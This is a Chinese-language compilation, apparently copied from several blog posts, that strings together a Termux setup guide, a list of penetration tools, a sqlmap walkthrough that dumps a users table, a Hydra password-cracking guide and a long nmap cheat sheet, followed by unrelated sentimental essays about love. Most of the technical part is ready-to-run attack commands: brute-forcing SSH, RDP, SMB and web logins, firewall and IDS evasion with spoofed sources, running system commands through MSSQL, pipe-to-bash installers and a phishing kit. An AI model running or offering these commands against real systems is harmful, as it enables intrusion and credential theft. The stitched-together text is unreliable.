termux

vim会出现中文乱码!

当然依然可以解决

vim .vimrc

然后写入以下内容

set fileencodings=utf-8,gb2312,gb18030,gbk,ucs-bom,cp936,latin1

set enc=utf8

set fencs=utf8,gbk,gb2312,gb18030

最后source一下

source .vimrc

ok了,现在你的vim可以显示中文了

然后来配置python吧(准备好1g空间)

安装python和python2(termux默认python版本是python3)

pkg install python python-dev python2 python2-dev -y

python安装好了然后安装依赖

apt install libxml2 libxml2-dev libxslt libxslt-dev openssl libffi libffi-dev openssl-tool openssl-dev fftw fftw-dev libzmq libzmq-dev freetype freetype-dev libpng libpng-dev pkg-config scrypt -y

pkg install libcrypt libcrypt-dev ccrypt libgcrypt libgcrypt-dev -y

这两条把python需要的依赖库基本上安装完了(只多不少)

然后升级一下pip

python2 -m pip install –upgrade pip

python -m pip install –upgrade pip

升级了pip那么可以随意使用pip安装python库了,比如numpy,matplotlib。pygame的话目前不行,图形化的界面需要依靠jupyter notebook

但是注意numpy需要指定为1.12版

LDFLAGS=” -lm -lcompiler_rt” pip install numpy==1.12

ps.python库的编译时间只能用噩梦来形容,如果没有保存请不要自行退出

我这里整合一下吧

#&表示后台执行,so这是多线程的

LDFLAGS=” -lm -lcompiler_rt” pip install numpy==1.12.1 &

LDFLAGS=” -lm -lcompiler_rt” pip install matplotlib pandas jupyter &

pip install BeautifulSoup4 requests &

pip install lxml &

pip install scrapy &

pip install demjson tushare colorama &

pip install pillow &

pip install future

pip install paramiko


渗透测试套件(没有排名之分,序号只是好看)

嘿嘿,这里我又要强行插入一些东西了。在termux下如何使用su呢?

1.有root,安装tsu(最开始的命令已经包含了)

2.使用proot,最上面的指令也内置了。

食用方法:termux-chroot

1.metasploit

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

wget https://Auxilus.github.io/metasploit.sh

bash metasploit.sh

2.nmap

NMap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包。

最开始的那个指令就包含了nmap哦

3.hydra

Hydra是著名的黑客组织THC的一款开源暴力破解工具这是一个验证性质的工具,主要目的是:展示安全研究人员从远程获取一个系统认证权限。

最开始的那个长长的指令就包含了哦

4.sslscan

SSLscan主要探测基于ssl的服务,如https。SSLscan是一款探测目标服务器所支持的SSL加密算法工具

最开始的那个指令也包含了

5.httrack

这个不多说,百度吧(懒癌晚期)

6.socialfish

大名鼎鼎的SET在termux上面好像有点问题

只能使用这个代替了

git clone https://github.com/UndeadSec/SocialFish.git

cd SocialFish

pip install -r requirements.txt

7.xsstrike

XSStrike 是一款用于探测并利用XSS漏洞的脚本

git clone https://github.com/UltimateHackers/XSStrike.git

cd XSStrike

pip install -r requirements.txt

8.sqlmap

Sqlmap是十分著名的、自动化的SQL注入工具。

git clone htts://github.com/sqlmapproject/sqlmap.git

9.whatportis

介绍被我吃了

pip2 install whatportis

10.routersploit

RouterSploit是一个强大的漏洞利用框架,用于快速识别和利用路由器中的普通漏洞

pip2 install requests

git clone https://github.com/reverse-shell/routersploit

11.RED_HAWK

RED_HAWK是一个PHP开发的全信息收集工具,方便渗透测试人员在进行安全测试时快速方便的对目标进行信息收集的自动化工具。

git clone https://github.com/Tuhinshubhra/RED_HAWK.git

12.WPeku

WPSeku,一个 Linux 中的 WordPress 漏洞扫描器,它可以被用来找出你安装的 WordPress 的安全漏洞,并阻止潜在的威胁。

git clone https://github.com/m4ll0k/WPSeku.git

cd WPSeku

pip install -r requirements.txt

13.cupp

cupp是用python写的密码生成工具,它可以通过使用人输入相关信息产生符合社会工程学的密码文件。

git clone https://github.com/Mebus/cupp.git

14.hash-buster

Hash Buster是一个python脚本,它使用几个在线哈希破解程序在不到5秒内找到加密的明文。

git clone https://github.com/UltimateHackers/Hash-Buster.git

15.D-TECT

D-TECT是渗透测试的所有功能于一身的工具。这是专门进行渗透测试和安全研究,使其工作过程更轻松,而不是推出不同的工具来执行不同的任务。D-TECT提供了多种功能,并收集目标信息和检测功能,并找到不同的缺陷。

git clone https://github.com/shawarkhanethicalhacker/D-TECT.git

16.wascan

顾名思义,WAScan是一款针对Web应用程序安全的扫描程序。 它旨在使用“黑盒子”方法发现各种漏洞,这意味着它不会研究Web应用程序的源代码,但将像一个模糊器一样工作,扫描已部署的Web应用程序的页面,提取链接和表单以及攻击 脚本,发送有效载荷和寻找错误消息,等等。 WAScan基于python2.7,可以在任何有Python环境的平台上运行。

git clone https://github.com/m4ll0k/WAScan.git wascan

pip2 install BeautifulSoup

注意beautifulsoup这个库必须安装!

termux api

termux api是一个termux的插件,可以联系我下载

安装好之后需要在termux内安装termux-api

pkg install termux-api

然后可以优雅地使用termux-api了,至于如何使用,官网是最好的选择

nyancat

执行这个试试保证你会大吃一惊这是目前我发现termux可以图形化显示的唯一方法

二维码

echo “内容” |curl -F-=\<- qrenco.de

终端地图

npm install mapscii -g

mapscii

ps.个人认为使用不是非常方便

上下左右移动

y缩小

a放大

c转换为布莱夜文(咳咳,这个我貌似打错了,自己玩玩就知道了,语文不好)

caddy

caddy可以很方便在局域网内传文件

cd

curl https://getcaddy.com | bash -s personal http.filemanager

这是下载安装caddy,还需要配置

vim Caddyfile

写入以下内容

:8080 {

filemanager / /sdcard

timeouts none

gzip

}

最后启动就行了

caddy

浏览器访问:http://127.0.0.1:8080即可,局域网内的用户访问手机ip地址即可.

默认账号和密码为admin,admin.

数据库

pkg install mariadb

mysql_install_db

启动方法

mysqld

另外一些好玩的

curl aoaoao.me:1926

试试?很好玩的哦

如果要在termux内使用gui,请点这里

终端天气

curl wttr.in/城市名拼音?lang=zh

这个本人测试需要在bash执行,zsh貌似不可以……….

作者:nidhoggfgg
链接:https://www.jianshu.com/p/f41bc63d4246
来源:简书
简书著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

SQLMAP简单使用

      SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft  SQL  Server,Microsoft Acess,IBM DB2,SQLLite,Firebird,Sybase和SAP MaxDB……SQLmap采用几种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,对查询和盲注。其广泛的功能和选项包括数据库指纹,枚举,数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。

工具/原料

  • sqli-labs https://jingyan.baidu.com/article/67662997a0527d54d51b84df.html
  • sqlmap

方法/步骤

  1. 以sqli-labs第一关进行测试,使用phpstudy和sqli-labs搭建注入平台,可见工具搭建方法,打开第一关系统正常运行如下。
  2. 打开sqlmap输入Python sqlmap.py -u “http://10.10.10.1/sqli-labs-master/Less-1/?id=1” (-u参数指定目标注入地址)检测出存在可利用漏洞。
  3. 使用sqlmap注入获取数据库,Python sqlmap.py -u “http://10.10.10.1/sqli-labs-master/Less-1/?id=1”  –dbs 列取数据库的所有库。如图查询到所有库的名称。
  4. 列出当前数据库使用参数–current-db输入命令。Python sqlmap.py -u “http://10.10.10.1/sqli-labs-master/Less-1/?id=1” –current-db,如下图查询出当前库为security。
  5. 查询security库中存在的所有表,Python sqlmap.py -u “http://10.10.10.1/sqli-labs-master/Less-1/?id=1” -D security –tables如下图查询出四个表。
  6. 列出security库中users表中的所有列,Python sqlmap.py -u “http://10.10.10.1/sqli-labs-master/Less-1/?id=1” -D security -T users –columns(-D dbname指定数据库名称、-T tablename:指定某数据表的名称、–columns:列出指定表上的所有列)。
  7. 导出三个数据列中所有的数据:Python2 sqlmap.py -u “http://10.10.10.1/sqli-labs-master/Less-1/?id=1” -D security -T users -C id,username,password –dump (-D dbname:指定数据库名称、-T tablename:指定某数据表名称、-C Cnmme:指定列名、–dump:导出列里面的字段)。步骤阅读END

Linux下暴力破解工具Hydra详解

一、简介

hydra

Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, and is made available under GPLv3 with a special OpenSSL license expansion.

Currently this tool supports:
AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

For HTTP, POP3, IMAP and SMTP, several login mechanisms like plain and MD5 digest etc. are supported.

This tool is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.

The program is maintained by van Hauser and David Maciejak.

The Hackers Choice
http://www.thc.org/thc-hydra

二、安装

1、安装相关依赖包

Ubuntu/Debian
apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev hydra
  Debian和Ubuntu发行版,源里自带hydra,直接用apt-get在线安装。

Redhat/Fedora
yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
OpenSuSE
zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel
本实验用的是 CentOS release 5.6 (Final),执行yum install 后相关依赖包安装情况如下:

2、Hydra 安装

wget http://www.thc.org/releases/hydra-7.4.1.tar.gz

tar zxvf hydra-7.4.1.tar.gz

cd hydra-7.4.1

./configure

make && make install

./configure 会检测当前系统一些组件配置,主要是对于破解支持模块的检测,可根据需要安装对应的支持库和依赖包。

make

make install

三、Syntax

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]

[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]
-R
继续从上一次进度接着破解

-S
大写,采用SSL链接

-s
小写,可通过这个参数指定非默认端口

-l
指定破解的用户,对特定用户破解

-L
指定用户名字典

-p
小写,指定密码破解,少用,一般是采用密码字典

-P
大写,指定密码字典

-e
可选选项,n:空密码试探,s:使用指定用户和密码试探

-C
使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数

-M
指定目标列表文件一行一条

-o
指定结果输出文件

-f
在使用-M参数以后,找到第一对登录名或者密码的时候中止破解

-t
同时运行的线程数,默认为16

-w
设置最大超时的时间,单位秒,默认是30s

-v / -V
显示详细过程

server
目标ip

service
指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等

OPT
可选项

四、实例

1、手动创建用户名字典和密码字典,这里只是为了演示,只加了几个用户名和弱口令。真正破解时,需要利用密码字典生成器生成强大的字典。

2、破解ssh:

hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh

破解成功,直接显示结果。

也可以使用 -o 选项指定结果输出文件。

hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh

五、其他类型密码破解

破解ftp:

hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

get方式提交,破解web登录:
  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
post方式提交,破解web登录:
  该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:

  假设有以上一个密码登录表单,我们执行命令:

hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:invalido”

  说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。

  后面参数是网页中对应的表单字段的name 属性,后面中的内容是表示错误猜解的返回信息提示,可以自定义。</p> <p>破解https:</p> <h1>hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https</h1> <p>破解teamspeak:</p> <h1>hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak</h1> <p>破解cisco:</p> <h1>hydra -P pass.txt 10.36.16.18 cisco</h1> <h1>hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable</h1> <p>破解smb:</p> <h1>hydra -l administrator -P pass.txt 10.36.16.18 smb</h1> <p>破解pop3:</p> <h1>hydra -l muts -P pass.txt my.pop3.mail pop3</h1> <p>破解rdp:</p> <h1>hydra ip rdp -l administrator -P pass.txt -V</h1> <p>破解http-proxy:</p> <h1>hydra -l admin -P pass.txt http-proxy://10.36.16.18</h1> <p>破解imap:</p> <h1>hydra -L user.txt -p secret 10.36.16.18 imap PLAIN</h1> <h1>hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN</h1> <p>破解telnet</p> <h1>hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V</h1> <p>六、总结</p> <p>此工具强大之处远多于以上测试,其密码能否破解关键在于强大的字典,对于社工型渗透来说,有时能够得到事半功倍的效果。</p>

nmap使用方法

一、主机发现

1. 全面扫描/综合扫描
nmap -A 192.168.1.103

2. Ping扫描
nmap -sP 192.168.1.1/24

3. 免Ping扫描,穿透防火墙,避免被防火墙发现
nmap -P0 192.168.1.103

4. TCP SYN Ping 扫描
nmap -PS -v 192.168.1.103
nmap -PS80,10-100 -v 192.168.1.103 (针对防火墙丢弃RST包)

5. TCP ACK Ping 扫描
nmap -PA -v 192.168.1.103

6. UDP Ping 扫描
nmap -PU -v 192.168.1.103

7. ICMP Ping Types 扫描
nmap -PU -v 192.168.1.103    (ICMP ECHO)
nmap -PP -v 192.168.1.103    (ICMP 时间戳)
nmap -PM -v 192.168.1.103    (ICMP 地址掩码)

8. ARP Ping 扫描
nmap -PR -v 192.168.1.103

9. 列表 扫描
nmap -sL -v 192.168.1.103

10. 禁止方向域名解析
nmap -n -sL -v 192.168.1.103

11. 方向域名解析
nmap -R -sL -v 192.168.1.103

12. 使用系统域名解析系统
nmap –system-dns 192.168.1.2 192.168.1.103

13. 扫描IPV6地址
nmap -6 IPv6

14. 路由跟踪
nmap –traceroute -v www.sunbridgegroup.com

15. SCTP INIT Ping 扫描
nmap -PY -v 192.168.1.103

二、端口扫描
1. 时序扫描
nmap -T(0-5) 192.168.1.103

2. 常用扫描方式
nmap -p 80 192.168.1.103
nmap -p 80-100 192.168.1.103
nmap -p T:80,U:445 192.168.1.103
nmap -F 192.168.1.1.103    (快速扫描)
nmap –top-ports 100 192.168.1.103    (扫描最有用的前100个端口)

3. TCP SYN 扫描 (高效的扫描方式)[半开链接扫描]
nmap -sS -v 192.168.1.103

4. TCP 连接扫描[全连接扫描]
nmap -sT -v 192.168.1.103

5. UDP 连接扫描
nmap -sU -p 80-100 192.168.1.103

6. 隐蔽扫描
nmap -sN 61.241.194.153(NULL扫描)
nmap -sF 61.241.194.153(FIN扫描)
nmap -sX 61.241.194.153(Xmas扫描)

7. TCP ACK 扫描
nmap -sA 192.168.1.103

8. TCP 窗口扫描
nmap -sW -v -F  192.168.1.103

9. TCP Maimon 扫描
nmap -sM -T4  192.168.1.103

10. 自定义 扫描
nmap -sT –scanflags SYNURG 192.168.1.103

11. 空闲 扫描( 隐藏IP )
nmap -sI www.0day.co:80 192.168.1.103

12. IP协议 扫描
nmap -sO -T4 192.168.1.103

13. FTP Bounce 扫描
(已经不被支持)


三、指纹识别与探测
1. 版本探测(显示banner信息)
nmap -sV 192.168.1.103
nmap -sV -A 192.168.1.103

2. 全端口版本探测
nmap -sV –allports 192.168.1.103

3. 设置扫描强度
nmap -sV –version-intensity (0-9) 192.168.1.103

4. 轻量级扫描
nmap -sV –version-light 2 192.168.1.103

5. 重量级扫描
nmap -sV –version-all 192.168.1.103

6. 获取详细版本信息
nmap -sV –version-trace 192.168.1.103

7. RPC扫描
nmap -sS -sR 192.168.1.103

8. 对指定的目标进行操作系统监测
nmap -O –osscan-limit 192.168.1.103

9. 推测系统并识别
nmap -O –osscan-guess 192.168.1.103


四、伺机而动
1. 调整并行扫描组的大小
nmap –min-hostgroup 30 192.168.1.110/24
nmap –max-hostgroup 30 902 192.168.1.104

2. 调整探测报文的并行度
nmap –min-parallelism 100 192.168.1.104
nmap –max-parallelism 100 192.168.1.104

3. 调整探测报文超时
nmap –initial-rtt-timeout 100ms 192.168.1.104
nmap –max-rtt-timeout 100ms 192.168.1.104
nmap –min-rtt-timeout 100ms 192.168.1.104

4. 放弃缓慢的目标主机
nmap –host-timeout 1800000ms 192.168.1.104

5. 调整报文适合时间间隔
nmap –scan-delay 1s 192.168.1.104
nmap –max-scan-delay 1s 192.168.1.104


五、防火墙/IDS逃逸
1. 报文分段
nmap -f -v 61.241.194.153

2. 指定偏移大小
nmap –mtu 16 192.168.1.104

3. IP欺骗
nmap -D RND:11 192.168.1.104
nmap -D 192.168.1.104,192.168.1.103,192.168.1.101 192.168.1.104

4. 源地址欺骗
nmap -sI www.0day.cn:80 192.168.1.104

5. 源端口欺骗
nmap –source-port 902 192.168.1.104

6. 指定发包长度
nmap –data-length 30 192.168.1.104

7. 目标主机随机排序
nmap –randomize-hosts 192.168.1.104

8. MAX地址欺骗
nmap -sT -Pn –spoof-mac 0 192.168.1.104


六、信息收集
1. IP信息收集
nmap –script ip-geolocation-* www.pcos.cn

2. WHOIS 查询
nmap –script whois-domain www.pcos.cn
nmap –script whois-domain –script-args whois.whodb=nofollow www.ithome.com
nmap -sn –script whois-domain -v -iL host.txt

3. 搜索邮件信息(新版可能没有这个模块)
nmap –script http-email-harvest www.pcos.cn

4. IP反查
nmap -sn –script hostmap-ip2hosts www.pcos.cn

5. DNS信息收集
nmap –script dns-brute www.pcos.cn
nmap –script dns-brute dns-brute.threads=10 www.pcos.cn
nmap –script dns-brute dns-brute.threads=10,dns-brute.hostlis www.pcos.cn

6. 检索系统信息
nmap -p 445 445 192.168.1.104 –script membase-http-info

7. 后台打印机服务漏洞
nmap –script smb-security-mode.nse -p 445 119.29.155.45

8. 系统漏洞扫描
nmap –script smb-check-vulns.nse -p 445 119.29.155.45

9.扫描Web漏洞
nmap -p80 –script http-stored-xss.nse/http-sql-injection.nse 119.29.155.45

10. 通过 Snmp 列举 Windows 服务/账户
nmap -sU -p 161 –script=snmp-win32-services 192.168.1.104
nmap -sU -f -p 161 –script=snmp-win32-users 192.168.1.110

11. 枚举 DNS 服务器的主机名
nmap –script dns-brute –script-args dns-brute.domain=baidu.com

12. HTTP信息收集
nmap -sV -p 80 www.0day.com (HTTP版本探测)
nmap -p 80 –script=http-headers www.pcos.cn (HTTP信息头探测)
nmap -p 80 –script=http-sitemap-generator www.pcos.cn (爬行Web目录结构)

13. 枚举SSL密钥
nmap -p 443 –script=ssl-enum-ciphers www.baidu.com

14. SSH服务密钥信息探测
map -p 22 –script ssh-hostkey –script-args ssh_hostkey=full 127.0.0.1


七、数据库渗透测试
1. Mysql列举数据库
nmap -p3306 –script=mysql-databases –script-args mysqluser=root,mysqlpass 192.168.1.101

2. 列举 MySQL 变量
nmap -p3306 –script=mysql-variables 192.168.1.3
nmap -sV –script=mysql-variables 192.168.1.3 (无法确定端口的情况下)

3. 检查 MySQL 密码
nmap -p3306 –script=mysql-empty-password 192.168.1.3
nmap -sV -F -T4 –script=mysql-empty-password 192.168.1.3

4. 审计 MySQL 密码
nmap –script=mysql-brute 192.168.1.101
nmap -p3306 –script=mysql-brute userdb=/root/passdb.txt passdb=/root/pass.txt 192.168.1.101 

(指定字典)

5. 审计 MySQL 安全配置
nmap -p3306 –script mysql-audit –script-args “mysql-audit.username=’root’,mysql-

audit.password=’123′,mysql-audit.filename=’nselib/data/mysql-cis.audit'” 192.168.1.104

6. 审计 Oracle 密码
nmap –script=oracle-brute -p 1521 –script-args oracle-brute.sid=test 192.168.1.121
nmap –script=oracle-brute -p 1521 –script-args oracle-brute.sid=test –script-args 

userdb=/tmp/usernames.txt,passdb=/tmp/password.txt 192.168.1.105

7. 审计 msSQL密码
nmap -p 1433 –script ms-sql-brute –script-args userdb=name.txt,passdb=pass.txt 

192.168.1.104

8. 检查 msSQL空密码
nmap -p 1433 –script ms-sql-empty-password 192.168.1.104

9. 读取 msSQL 数据
nmap -p 1433 –script ms-sql-tables –script-args mssql.username=sa,mssql.Password=sa 

192.168.1.101

10. 读取 msSQL 执行系统命令
nmap -p 1433 –script ms-sql-xp-cmdshell –script-args 

mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd=”ipconfig” 192.168.1.101

11. 审计 PgSQL 密码
nmap -p 5432 –script pgsql-brute 192.168.1.101


八、渗透测试
1. 审计 HTTP 身份验证
nmap –script=http-brute -p 80 www.pcos.cn

2. 审计 FTP 服务器
nmap –script ftp-brute -p 21 192.168.1.101
nmap –script ftp-brute –script-args userdb=user.txt,passdb=pass.txt -p 21 192.168.1.101
nmap –script=ftp-anon 192.168.1.101

3. 审计 WordPress 程序
nmap -p80 –script http-wordpress-brute 192.168.1.110
nmap -p80 –script http-wordpress-brute –script-args userdb=user.txt,passdb=passwd.txt 

192.168.1.110
nmap -p80 –script http-wordpress-brute –script-args http-wordpress-brute.threads=10 

192.168.1.110

4. 审计 Joomla 程序
nmap -p80 –script http-joomla-brute 192.168.1.110
nmap -p80 –script http-joomla-brute –script-args uesrdb=user.txt,passdb=passwd.txt 

192.168.1.110
nmap -p80 –script http-joomla-brute –script-args uesrdb=user.txt,passdb=passwd.txt,http-

joomla-brute.threads=5 192.168.1.110

5. 审计 邮件服务器 
nmap -p110 –script=pop3-brute 192.168.1.110

6. 审计 SMB 口令
nmap –script smb-brute.nse -p 445 192.168.1.110
nmap –script smb-brute.nse –script-args passdb=pass.txt -p 445 192.168.1.110

7. 审计 VNC 服务
nmap –script vnc-brute -p 5900 192.168.1.110

8. 审计 SMTP 服务器
nmap -p 25 –script smtp-brute 192.168.1.110
nmap -p 25 –script=smtp-enum-users.nse smith.jack.com (枚举远程系统所有用户)

9. 检测 Stuxnet 蠕虫
nmap –script stuxnet-detect -p 445 192.168.1.110

10. SNMP 服务安全审计
nmap -sU -p 161 –script=snmp-netstat 192.168.1.101 (获取目标主机网络连接状态)
nmap -sU -p 161 –script=snmp-processes 192.168.1.110 (枚举目标主机的系统进程)
nmap -sU -p 161 –script=snmp-win32-services 192.168.1.110 (获得windows服务器的服务)
nmap -sU -p 161 –script snmp-brute 192.168.1.110


九、Zenmap
1. Intense scan (详细扫描)
nmap -T4 -A -v 192.168.1.101

2. Intense scan plus UDP (UDP扫描经典使用)
nmap -sS -sU -T4 -A -v 192.168.1.101

3. Intense scan, all TCP ports (TCP扫描)
nmap -p 1-65535 -T4 -A -v 192.168.1.101

4. Intense scan, no ping (无Ping扫描)
nmap -T4 -A -v -Pn 192.168.1.101

5. Ping scan (Ping扫描)
nmap -sn 192.168.1.101/24

6. Quick scan
nmap -T4 -F 192.168.1.101/24

7. Quick scan plus
nmap -sV -T4 -O -F –version-light 192.168.1.101/24

8. Quick traceroute
nmap -sn –traceroute 192.168.1.101

9. Regular scan 
nmap 192.168.1.101

10. Slow comprehensive scan
nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 –script “default or 

(discovery and safe)” 192.168.1.101


十. Nmap 技巧
1. 发送以太网数据包
nmap –send-eth 192.168.1.111

2. 网络层发送
nmap –send-ip 192.168.1.111

3. 假定拥有所有权
nmap –privileged 192.168.1.111

4. 在交互模式中启动
nmap –interactive

5. 查看 Nmap 版本号
nmap -V

6. 设置调试级别
nmap -d (1-9) 192.168.1.111

7. 跟踪发送接收的报文
nmap –packet-trace -p 20-30 192.168.1.111

8. 列举接口和路由
nmap –iflist www.iteye.com

9. 指定网络接口
nmap -e eth0 192.168.1.111

10. 继续中断扫描
nmap -oG 1.txt -v 192.168.126.1/24
nmap –resume 1.txt (继续扫描)

11. Dnmap
dnmap_server -f test (指定命令脚本)
dnmap_client -s 192.168.1.107 -a test

12. 编写 Nse 脚本

    (1)    — The scanning module —
        author = “Wing”
        categories = {“version”}

        portrule = function(host,port)
            return port.protocol == “tcp” and port.number == 80 and port.state == “open”
        end

        action = function(host,port)
            return “Found!!!”
        end

    (2) — The scanning module —
        author = “Wing”
        categories = {“version”}

        local comm=require “comm”
        require “shortport”
        local http=require “http”

        portrule = function(host,port)
            return (port.number == 80) and (port.start==”open”)
        end

        action = function(host,port)
            local uri = “/admin.php”
            local response = http.get(host,port,uri)
            return “Found!!!”
        end

13. 探测防火墙
nmap –script=firewalk –traceroute 192.168.1.111

14. VMware认证破解
nmap -p 902 –script vmauthd-brute 192.168.1.107


十一. Nmap的保存和输出
1. 标准保存
nmap -F -oN d:/test1.txt 192.168.1.111

2. XML保存
nmap -F -oX d:/test1.xml 192.168.1.111

3. 133t 保存
nmap -F -oS d:/test2.txt 192.168.1.111

4. Grep 保存
nmap -F -oG d:/test2.txt 192.168.1.111

5. 保存到所有格式
nmap -F -oA d:/test2 192.168.1.111

6. 补充保存文件
nmap -F -append-output -oN d:/test2.txt 192.168.1.111

7. 转换 XML 保存
nmap -F -oX testB.xml –stylesheet http://www.insecure.org/nmap/data/nmap.xsl 192.168.1.111

8. 忽略 XML 声明的 XSL 样式表
nmap -oX d:/testC.xml –no-stylesheet 192.168.1.111

真正在乎一个人,才会怕失去。

年光似鸟翩翩过,世事如棋局局新,就算你在完美,在努力,也不能保证每个人都对你另眼相看,凡事尽力就够了,不可对结果过于强求。有些事情不是我们坚持的就能够得来的。

在这个世界上,没有一个人是无畏的。每个人的心里都有害怕的东西,害怕失去一个重要的东西,害怕失去一个重要的人。就是因为我们心里有爱,所以才会害怕。

不知道你是否真正的在乎一个人,在乎到怕他离开你的世界,怕他从此在你的世界中消失不见。这样的人,你是否曾经拥有过呢?或许你只是呵呵一笑。
你这个笑容中到底包含了多少心酸与无奈?是不是在经过了所有的努力无果之后,才露出来的笑容呢?其实我们没有必要去隐藏自己的痛苦,因为在这个世界上,每个人都有痛苦。

求而不得,也算是人生中的一大憾事吧。小的时候我们以为自己想要的东西,就要哭一哭闹一闹就会给我们。可是长大后才发现那是父母才会做的事情。

等你长大了,所有的事情都会变得身不由己,你只能够一个人负重前行。知道真正的碰到那个温暖的人,他会成为你的避风港湾。当你真的爱上就会在乎。
在乎和害怕总会是相互依存的,虽然在这个世界上我们会遇见很多人,但是真正能让我们放在心里的也就那几个。因为一个人的心的空间是有限的。

很多人在爱上的时候,总会变得惶恐不安。他们会害怕自己爱的那个人会离自己远去。其实这是一种正常的想法。只有真正的爱上了才会想要拥有它。

那些所谓的在乎最终的结局,只在乎曾经拥有,都是骗人的幌子。那一个人愿意把自己最爱的那个人给其他的人?其实每个人最大的幸福就是能给自己爱的那个人幸福。

在爱情中都变得仁慈一点吧。如果你是真正的爱她就多考虑一下他的感受。就多容忍一下她那些占有欲。因为爱你所以才想要拥有你,这就是在乎。

就像孩童时期的我们讨厌别人触碰我们的东西,因为我们对自己的东西带有一种强烈的占有欲,因为那是我们喜欢的东西,这就是我们内心的在乎。

我们都不是小孩子了。在每个人的心里都有自己想要守护的东西。如果你找到了你想要守护的东西,那么请好好的守护她。不要因为自己的疏忽而丢失。

世界很大,当你丢失了一个东西之后再也找不回来了。既然在乎了,既然爱了,那么就放手好好的搏一场吧。真的只有真正的在乎了,才会那么害怕失去

心有所想

                           世上,没有无缘无故的恨

心上,没有毫无理由的情

人与人之间,因为缘份才遇见

心与心之上,因为懂得而相知

真心不是一天能建立

而是日积月累的付出

真意不是一年就深厚

而是相互固守的结果

你付出真诚,我才珍惜

因为真心,才会退让

你知道理解,我才尊重

因为包容,才会长久